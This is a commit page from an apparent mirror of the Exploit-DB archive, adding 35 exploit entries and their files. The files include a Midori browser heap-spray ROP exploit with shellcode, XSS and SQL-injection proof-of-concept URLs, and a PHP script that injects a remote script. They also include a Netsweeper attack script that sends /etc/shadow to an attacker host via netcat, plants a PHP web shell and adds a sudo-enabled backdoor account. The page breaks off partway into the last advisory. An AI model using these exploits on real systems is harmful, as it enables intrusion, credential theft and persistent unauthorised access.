bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-08-22

Browse source 
35 new exploits
This commit is contained in:
Offensive Security 2015-08-22 05:01:36 +00:00
parent 6dccd55e18
commit 40a9571fd7
36 changed files with 2207 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
files.csv
View file

@ -34210,3 +34210,38 @@ id,file,description,date,author,platform,type,port
37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,"_ Un_N0n _",windows,dos,21
37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting Vulnerability",2012-09-26,"Scott Herbert",php,webapps,0
37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 Denial of Service Vulnerability",2012-09-27,"Ryuzaki Lawlet",linux,dos,0
37898,platforms/windows/local/37898.py,"Reaver Pro Local Privilege Escalation Vulnerability",2012-09-30,infodox,windows,local,0
37899,platforms/php/webapps/37899.txt,"Switchvox Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0
37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0
37901,platforms/php/webapps/37901.txt,"AlamFifa CMS 'user_name_cookie' Parameter SQL Injection Vulnerability",2012-09-30,L0n3ly-H34rT,php,webapps,0
37902,platforms/php/webapps/37902.php,"WordPress Akismet Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0
37903,platforms/php/webapps/37903.txt,"Zenphoto 'admin-news-articles.php' Cross Site Scripting Vulnerability",2012-10-02,"Scott Herbert",php,webapps,0
37904,platforms/php/webapps/37904.txt,"Omnistar Mailer Multiple SQL Injection and HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",php,webapps,0
37905,platforms/windows/dos/37905.rb,"PowerTCP WebServer for ActiveX Denial of Service Vulnerability",2012-09-28,catatonicprime,windows,dos,0
37907,platforms/php/webapps/37907.txt,"WordPress MDC Private Message Plugin 1.0.0 - Persistent XSS",2015-08-21,"Chris Kellum",php,webapps,80
37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0
37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 wwlib.dll Type Confusion",2015-08-21,"Google Security Research",windows,dos,0
37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write",2015-08-21,"Google Security Research",windows,dos,0
37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 MSO.dll Arbitrary Free",2015-08-21,"Google Security Research",windows,dos,0
37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 MSO.dll Use-After-Free",2015-08-21,"Google Security Research",windows,dos,0
37914,platforms/windows/dos/37914.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos,0
37915,platforms/windows/dos/37915.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37916,platforms/windows/dos/37916.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37917,platforms/windows/dos/37917.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37918,platforms/windows/dos/37918.txt,"Windows win32k.sys TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0
37919,platforms/windows/dos/37919.txt,"Windows win32k.sys TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0
37920,platforms/windows/dos/37920.txt,"Windows ATMFD.DLL Write to Uninitialized Address Due to Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37921,platforms/windows/dos/37921.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37922,platforms/windows/dos/37922.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37923,platforms/windows/dos/37923.txt,"Windows ATMFD.DLL CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0
37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 MSPTLS Heap Index Integer Underflow",2015-08-21,"Google Security Research",windows,dos,0
37925,platforms/windows/local/37925.txt,"Mozilla Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0
37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
37929,platforms/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass Issue",2015-08-21,"Anastasios Monachos",php,webapps,0
37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload And Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0

Can't render this file because it is too large.

132
platforms/linux/dos/37897.html Executable file
View file

@ -0,0 +1,132 @@
source: http://www.securityfocus.com/bid/55709/info
The Midori Browser is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Midori Browser 0.3.2 is vulnerable; other versions may also be affected.
it****************************
<html>
<!-- ROP completed--->
<head>
<Title>Ubuntu 11.10 Calc p47l0d -- Rop Completed</title>
<script type="text/javascript">
function ignite() {
var carpet = 0x200;
var vftable = unescape("\x00% u0c10");
var pLand = "% u00fd% u0c10";
var pShell = "% u0000% u0c10";
var oldProt = "% u0000% u0c10";
var heap = unescape("% u0101% u0102"
+"% u0008% u0c10"
+"% u0105% u0106"
+"% u10c2% u7c34"//"% u0107% u0108" pop ecx;pop ecx;ret
+"% u0109% u010a"//
+"% u3134% u6d32"//"% u010b% u010c"//"% u6643% u6d6a" // mov eax,[esi]
+"% u787f% u6d32"//"% u010d% u010e"// xchg eax,esi;aam 0ff;dec ecx;ret
+"% u7b72% u6d83"//"% u010f% u0111" // pop edx;ret
+"% u0000% u0c10"//% u0112% u0113" // will be popped in edx //
+"% u2a30% u6d7f"//"% u0114% u0115" // mov ecx,esi;call [edx+50]
+pLand//"% u0116% u0117" // Address in shellcode to land change it accordingly
+"% ue8d4% u6d7f"//"% u0118% u0119" // mov [ecx],eax;pop ebp;ret
+"% u011a% u011b"// will be popped in ebp
+"% u1b02% u7c34"//"% u011c% u011d" // dec ecx;ret
+"% u1b02% u7c34"//"% u011e% u011f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0120% u0121" // dec ecx;ret
+"% u1b02% u7c34"//"% u0122% u0123" // dec ecx;ret
+"% u4edc% u7c34"//"% u0122% u0123" // pop eax;ret
+oldProt//"% u0124% u0125" // pOldProtection
+"% ue8d4% u6d7f"//"% u0126% u0127" // mov [ecx],eax;pop ebp;ret
+"% u4edb% u7c34"//"% u0128% u0129" // pop ebx;pop eax;ret // needed in initial phase.
+"% u1b02% u7c34"//"% u012a% u012b" // dec ecx;ret
+"% u1b02% u7c34"//"% u012c% u012d" // dec ecx;ret
+"% u4edb% u7c34"//"% u012e% u012f" // pop ebx;pop eax;ret
+"% u2643% u7c34"//"% u0130% u0131" // xchg eax,esp;pop edi;add byte ptr ds:[eax],al;pop ecx,ret
+"% u0040% u0000"//"% u0132% u0133" // newProptection = PAGE_READ_WRITE_EXECUTE
+"% u1b02% u7c34"//"% u0134% u0135" // dec ecx;ret
+"% u1b02% u7c34"//"% u0136% u0137" // dec ecx;ret
+"% ue8d4% u6d7f"//"% u0138% u0139" // mov [ecx],eax;pop ebp;ret
+"% u013a% u013b"// will be popped in ebp
+"% u1b02% u7c34"//"% u013c% u013d" // dec ecx;ret
+"% u1b02% u7c34"//"% u013e% u013f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0140% u0141" // dec ecx;ret
+"% u1b02% u7c34"//"% u0142% u0143" // dec ecx;ret
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret
+"% u0000% u0010"//"% u0146% u0147" // Size
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret
+"% u014a% u014b"// Will be popped in ebp.
+"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret
+pShell//"% u0146% u0147" // Address Of Shellcode block to change protection.
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret
+"% u014a% u014b"// Will be popped in ebp.
/* +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret
*/ +"% u4cc1% u7c34"//"% u0154% u0155" // pop eax;ret
+"% u9611% u7c34"//"% u0156% u0157" // will be popped in eax. pop edi;pop ebx;pop ebp;ret
+"% u347a% u7c34"//"% u0158% u0159" // push esi;push edi;call eax
+"% u4edc% u7c34"//"% u015a% u015b" // pop eax;ret
+"% u00e0% u0c10"//"% u015c% u015d" // will be popped in eax.
/* Need to fix the ebp for proper landing on shellcode */
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% u1f0a% u7c34"//"% u015e% u015f" // mov esp,ecx;mov ecx[eax];mov eax,[eax+4];push eax;ret
+"% u0160% u0161"
+"% u28dd% u7c35"//"% u0162% u0163" // VirtualProtect
+"% u0164% u0165"
+"% u0166% u0167"
+"% u0168% u0169"
+"% u016a% u016b"
+"% u016c% u016d"
)
/* Shellcode : */ +unescape("% u9090% u9090% u9090% u9090"
+"% u585b" // pop ebx;pop eax;
+"% u0a05% u0a13% u9000" // add eax,0a130a
+"% u008b" // mov eax,[eax]
+"% u056a" // push 05
+"% uc581% u0128% u0000" // add ebp,114
+"% u9055" // push ebp;nop
+"% u1505% u04d6% u9000" // add eax,4d615
+"% ud0ff" // call eax
+"% uBBBB% uCCCC% uDDDD% uEEEE"
/* command: */ +"% u6163% u636c% u652e% u6578% u0000% ucccc" // calc.exe
);
var vtable = unescape("\x04% u0c10");
while(vtable.length < 0x10000) {vtable += vtable;}
var heapblock = heap+vtable.substring(0,0x10000/2-heap.length*2);
while (heapblock.length<0x80000) {heapblock += heap+heapblock;}
var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2);
var spray = new Array();
for (var iter=0;iter<carpet;iter++){
spray[iter] = finalspray+heap;
}
/* vulnerability trigger : */
var arrobject = [0x444444444444];
for(;true;){(arrobject[0])++;}
}
</script>
</head>
<body>
<applet src="test.class" width=10 height=10></applet>
<input type=button value="Object++" onclick="ignite()" />
</body>
</html>
********************Exploit****************************

13
platforms/multiple/remote/37900.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/55740/info
IBM Lotus Notes Traveler is prone to a URI-redirection vulnerability, multiple HTML-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user and conduct phishing attacks. Other attacks are also possible.
IBM Lotus Notes Traveler 8.5.3 and prior are vulnerable; other versions may also be affected.
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=javascript:alert(document.cookie)
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua

9
platforms/php/webapps/37896.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55689/info
The ABC Test plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ABC Test 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/blog/wp-admin/admin.php?page=abctest&do=edit&id=%22%3E%3Ch1 %3EXSS%3C/h1

25
platforms/php/webapps/37899.txt Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/55739/info
Switchvox is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Switchvox 5.1.2 vulnerable; other versions may also be affected.
Review: Tools -> Sound Manager -> Create sound [Description]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
Review: Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM SOAP URL]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
Review: Setup -> Groups -> Create Extension Group [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
Review: Setup -> Outgoing calls -> Create Outgoing Call rule [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
Review: Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route [Note]
PoC:<iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
Review: Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

9
platforms/php/webapps/37901.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55746/info
AlamFifa CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AlamFifa CMS 1.0 Beta is vulnerable; other versions may also be affected.
user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;

37
platforms/php/webapps/37902.php Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/55749/info
The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
#!/usr/bin/php -f
<?php
#
# legacy.php curl exploit
#
//
// HTTP POST,
//
$target = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL,
"http://$target/wp-content/plugins/akismet/legacy.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"s=%2522%253E%253Cscript%2520src%253d%2F%2Fsantanafest.com.br%2Fenquete%2Fc%253E%253C%2Fscript%253E");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

9
platforms/php/webapps/37903.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55755/info
Zenphoto is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Zenphoto 1.4.3.2 is vulnerable; prior versions may also be affected.
http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>

25
platforms/php/webapps/37904.txt Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/55760/info
Omnistar Mailer is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, and steal cookie-based authentication credentials; other attacks are also possible.
Omnistar Mailer 7.2 is vulnerable; other versions may also be affected.
http://www.example.com/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#[SQLi]
http://www.example.com/mailer/admin/preview.php?id=-2'+union+Select+1--%20-[SQLi]
http://www.example.com/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list[SQLi]
http://www.example.com/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#[SQLi]
http://www.example.com/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-[SQLi]
http://www.example.com/mailertest/admin/pages.php?op=edit&id=16&form_id=2&apos;[SQLi]
http://www.example.com/mailertest/admin/contacts.php?op=edit&id=3&form_id=2&apos;[SQLi]
http://www.example.com/mailertest/users/index.php?profile=1&form_id=2&apos;[SQLi]
http://www.example.com/mailertest/users/register.php?form_id=2&apos;[SQLi]

29
platforms/php/webapps/37907.txt Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: WordPress MDC Private Message Persistent XSS
# Date: 8/20/15
# Exploit Author: Chris Kellum
# Vendor Homepage: http://medhabi.com/
# https://wordpress.org/plugins/mdc-private-message/
# Version: 1.0.0
=====================
Vulnerability Details
=====================
The 'message' field doesn't sanitize input, allowing a less privileged user (Editor, Author, etc.)
to execute an XSS attack against an Administrator.
Proof of Concept:
Place <script>alert('Hello!')</script> in the message field of a private message and then submit.
Open the message and the alert window will fire.
===================
Disclosure Timeline
===================
8/16/15 - Vendor notified.
8/19/15 - Version 1.0.1 released.
8/20/15 - Public Disclosure.

40
platforms/php/webapps/37926.txt Executable file
View file

@ -0,0 +1,40 @@
+-------------------------------------+
+ Netsweeper 2.6.29.8 - SQL Injection +
+-------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 2.6.29.8 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9613
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
Two specific parameters in two pages of Netsweeper Content Filtering solution v2.6.29.8 (and probable earlier versions) are vulnerable to SQL injection.
Condition: The exploitation can be performed by any non-authenticated user with access to the vulnerable pages (usually from everyone).
Vulnerability Type: SQL Injection [SQLi-I]
Vulnerable Page I: http://netsweeper/webadmin/auth/verification.php
Vulnerable POST Parameter: login
Vulnerability Type: SQL Injection [SQLi-II]
Vulnerable Page II: http://netsweeper/webadmin/deny/index.php
Vulnerable POST Parameter: dpid
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
12-Jan-2011: Netsweeper fixed issue on 2.6.29.10
17-Jan-2015: CVE assigned CVE-2014-9613
11-Aug-2015: Public disclosure

40
platforms/php/webapps/37927.txt Executable file
View file

@ -0,0 +1,40 @@
+----------------------------------+
+ Netsweeper 4.0.4 - SQL Injection +
+----------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 4.0.4 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9612
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
Once specific parameter in Netsweeper 3.0.6, 4.0.3 and 4.0.4 (and probably other versions) was identified being vulnerable to SQL injection attacks.
Condition: The exploitation can be performed by any non-authenticated user with access to the vulnerable pages (usually from everyone).
Vulnerable Page: http://netsweeper:8080/remotereporter/load_logfiles.php?server=<SQLi>&url=a
Vulnerable GET Parameter: server
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9612
11-Aug-2015: Public disclosure

56
platforms/php/webapps/37928.txt Executable file
View file

@ -0,0 +1,56 @@
+----------------------------------------------------------------+
+ Netsweeper 4.0.8 - SQL Injection Authentication Bypass (Admin) +
+----------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com/
Version : 4.0.8 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9605
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
By adding two single-quotes in an specific HTTP request, it forces Netsweeeper 4.0.8 (and probably other versions) to authenticate us as admin. The access gives us the ability to:
i) "Back Up the System" which creates a downloadable system backup tarball file (containing the whole /etc /usr and /var folders)
ii) "Restart" the server
iii) "Stop the filters on the server"
Vulnerability Type: Authentication Bypass (using two single-quotes)
p0c: http://netsweeper/webupgrade/webupgrade.php
POST: step=&login='&password='&show_advanced_output=
p0c restart the server:
http://netsweeper/webupgrade/webupgrade.php
POST: step=12&login='&password='&show_advanced_output=
followed by
http://netsweeper/webupgrade/webupgrade.php HTTP/1.1
POST: step=12&restart=yes&show_advanced_output=false
p0c stop the filters on the server:
http://netsweeper/webupgrade/webupgrade.php
POST: step=9&stopservices=yes&show_advanced_output=
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9605
11-Aug-2015: Public disclosure

37
platforms/php/webapps/37929.txt Executable file
View file

@ -0,0 +1,37 @@
+-----------------------------------------------------------------------+
+ Netsweeper 4.0.8 - Authentication Bypass (Disabling of IP Quarantine) +
+-----------------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 4.0.8 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9610
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
An unauthenticated user is able to remove from quarantine any IP address on Netsweeeper 4.0.8 (and probably other versions).
URL Path: http://netsweeper/webadmin/user/quarantine_disable.php?ip=127.0.0.1
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9610
11-Aug-2015: Public disclosure

67
platforms/php/webapps/37930.txt Executable file
View file

@ -0,0 +1,67 @@
+--------------------------------------------------------+
+ Netsweeper 4.0.9 - Arbitrary File Upload and Execution +
+--------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 4.0.9 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : [CVE-2015-PENDING]
Advisory ID : [SECUID0-15-005]
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
Netsweeeper 4.0.9 (and probably other versions) allows an authenticated user with admin privileges, to upload arbitrary PHP code (eg PHP shell) and further execute it with root rights.
To replicate the bug:
1. Login as admin at https://<netsweeper>/webadmin
2. Go to System Tools | System Configuration
3. Select "Routes Advertising Service" then Add new Peer, and add the below:
4. At Peer Address (enter <netsweeper>'s IP, you may also use its default IP 192.168.100.100): 192.168.100.100
5. Comment: pwn3d
6. At File Template (copy and paste the below):
-----code snippet-----
#!/bin/sh
/usr/bin/nc <attacker_ip> 1234 < /etc/shadow
echo "<?php if(isset(\$_REQUEST['c'])){echo \"<pre>\";\$c=(\$_REQUEST['c']);system(\$c);echo \"</pre>\";die;} ?>" > /usr/local/netsweeper/webadmin/logs/secuid0.php
echo "secuid0:x:501:500::/tmp/:/bin/bash" >> /etc/passwd
#set secuid0 password to "secuid0"
echo "secuid0:\$1\$h8DmA\$LmWhQ71Bp6u253YOUTdnc0:16452:0:99999:7:::" >> /etc/shadow
echo "secuid0 ALL=(ALL) ALL" >> /etc/sudoers
#secuid0.net
-----code snippet-----
7. <Click the "Advanced Settings" button to show more fields>
8. Config file, set it to: /tmp/secuid0.sh
9. Service Restart Command, set it to: /bin/bash /tmp/secuid0.sh
10. Set up your netcat listener on port 1234
11. Once you submit the above bash script and rest of details ... you will receive a copy of /etc/shadow to your attacker_ip's netcat listener (#10), and also you will be able to interact with the injected php shell from: http://<netsweeper>/webadmin/logs/secuid0.php?c=ls
The injected script /tmp/secuid0.sh will run with root's privileges, so essentially the attacker owns the box and profits.
[root@localhost logs]# ls -al /tmp/
...
-rw-r--r-- 1 root root 219 Feb 30 12:40 secuid0.sh
...
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
06-Apr-2015: CVE Request
08-Apr-2015: Issues reported to Netsweeper
08-Apr-2015: Netsweeper bug ID 15475
08-Apr-2015: Netsweeper response, tickets opened and issues will be resolved in the 4.0.11 and 4.1.5 releases
11-Aug-2015: Public disclosure

36
platforms/php/webapps/37931.txt Executable file
View file

@ -0,0 +1,36 @@
+------------------------------------------------------------------------+
+ Netsweeper 3.0.6 - Authentication Bypass (Account and Policy Creation) +
+------------------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 3.0.6 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9611
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
An non-authenticated is able to provision new user accounts (and also create new policies under the same name as the newly created user accounts)
URL Path: http:/netsweeper:8080/webadmin/nslam/index.php?username=secuid0&password=secuid0&ip=127.0.0.1&theme=Global%20Web%20Admin%20Theme&groupname=
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
18-Dec-2014: Confirm fix on version 4.0.5
17-Jan-2015: CVE assigned CVE-2014-9611
11-Aug-2015: Public disclosure

42
platforms/php/webapps/37932.txt Executable file
View file

@ -0,0 +1,42 @@
+--------------------------------------------------------+
+ Netsweeper 4.0.8 - Arbitrary File Upload and Execution +
+--------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 4.0.8 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
